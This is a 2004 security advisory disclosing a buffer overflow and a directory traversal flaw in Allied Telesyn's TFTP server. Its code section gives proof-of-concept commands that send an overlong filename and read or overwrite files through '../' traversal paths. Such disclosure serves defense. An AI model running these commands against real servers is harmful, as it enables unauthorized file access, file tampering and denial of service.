####################################################################### Luigi Auriemma Application: Allied Telesyn TFTP Daemon http://www.alliedtelesyn.com http://www.alliedtelesyn.co.nz/support/rapier/download.html Versions: <= 1.8 Platforms: Windows Bugs: A] buffer overflow B] directory traversal Exploitation: remote Date: 30 October 2004 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Allied Telesyn TFTP Daemon (AT-TFTP) is a TFTP server with the primary function to transfer files between PC and the network products of the vendor, but naturally it can be used also as a normal TFTP server. ####################################################################### ======= 2) Bugs ======= ------------------ A] buffer overflow ------------------ A buffer overflow exists in the remote filename field if it is longer 229 bytes or more. ---------------------- B] directory traversal ---------------------- An attacker is able to download and upload (upload only if the Read/Write mode is selected) files everywhere in the disk on which is set the default transfer directory of the server using the classical dot-dot-slash pattern. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/tftpx.zip A] tftpx -f server 229 none B] tftpx server ../secret.txt secret.txt tftpx -u server ../../windows/calc.exe evil.exe ####################################################################### ====== 4) Fix ====== No fix. I have not been able to contact the developers because there are no mail addresses on the website and those available in the readme file are unavailable. #######################################################################